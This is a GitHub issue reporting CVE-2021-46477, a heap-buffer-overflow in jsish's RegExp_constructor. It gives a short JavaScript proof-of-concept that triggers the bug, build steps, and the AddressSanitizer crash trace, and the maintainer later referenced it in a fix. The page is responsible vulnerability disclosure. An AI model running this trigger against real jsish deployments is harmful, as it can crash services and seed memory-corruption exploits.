CVE-2021-46477: Heap-buffer-overflow src/jsiRegexp.c:176 in RegExp_constructor · Issue #63 · pcmacdon/jsish

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

Comments

Jsish revision

Commit: 9fa798e

Version: v3.5.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

export CFLAGS=’-fsanitize=address’ make

Test case

function JSEtest() { var bound; var t; bound = RegExp.bind('baz’, ‘quuux’); t = new bound(‘i’); }

try { JSEtest(); } catch (e) { }

​

Execution steps & Output

$ ./jsish/jsish poc.js

==21392==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000018e48 at pc 0x55de4613ce12 bp 0x7ffdf013bf00 sp 0x7ffdf013bef0 WRITE of size 8 at 0x604000018e48 thread T0 #0 0x55de4613ce11 in RegExp_constructor src/jsiRegexp.c:176 #1 0x55de4619b818 in jsi_FuncCallSub src/jsiProto.c:244 #2 0x55de46118fec in jsi_FunctionInvoke src/jsiFunc.c:777 #3 0x55de46118fec in Jsi_FunctionInvoke src/jsiFunc.c:789 #4 0x55de46194ad6 in jsi_FuncBindCall src/jsiProto.c:299 #5 0x55de4619b818 in jsi_FuncCallSub src/jsiProto.c:244 #6 0x55de4646571a in jsiFunctionSubCall src/jsiEval.c:796 #7 0x55de4646571a in jsiEvalFunction src/jsiEval.c:837 #8 0x55de4646571a in jsiEvalCodeSub src/jsiEval.c:1264 #9 0x55de4647915e in jsi_evalcode src/jsiEval.c:2204 #10 0x55de4619c834 in jsi_FuncCallSub src/jsiProto.c:220 #11 0x55de464655ab in jsiFunctionSubCall src/jsiEval.c:796 #12 0x55de464655ab in jsiEvalFunction src/jsiEval.c:837 #13 0x55de464655ab in jsiEvalCodeSub src/jsiEval.c:1264 #14 0x55de4647915e in jsi_evalcode src/jsiEval.c:2204 #15 0x55de4647d274 in jsi_evalStrFile src/jsiEval.c:2665 #16 0x55de4616c66a in Jsi_Main src/jsiInterp.c:936 #17 0x55de4697103a in jsi_main src/main.c:47 #18 0x7ff1757adbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #19 0x55de46100969 in _start (/usr/local/bin/jsish+0xe8969)

0x604000018e48 is located 8 bytes to the left of 48-byte region [0x604000018e50,0x604000018e80) allocated by thread T0 here: #0 0x7ff17641cd28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x55de46171aa4 in Jsi_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiRegexp.c:176 in RegExp_constructor Shadow bytes around the buggy address: 0x0c087fffb170: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb180: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb190: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa 0x0c087fffb1a0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa 0x0c087fffb1b0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa =>0x0c087fffb1c0: fa fa 00 00 00 00 00 04 fa[fa]00 00 00 00 00 00 0x0c087fffb1d0: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 06 0x0c087fffb1e0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa 0x0c087fffb1f0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb200: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb210: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb

Credits: Found by OWL337 team.

pcmacdon referenced this issue

Dec 27, 2021

FossilOrigin-Name: ef9d33b5fa866924ce4876daaf706343aec976bc09de6eba0bcb15c7eef3b50d

2 participants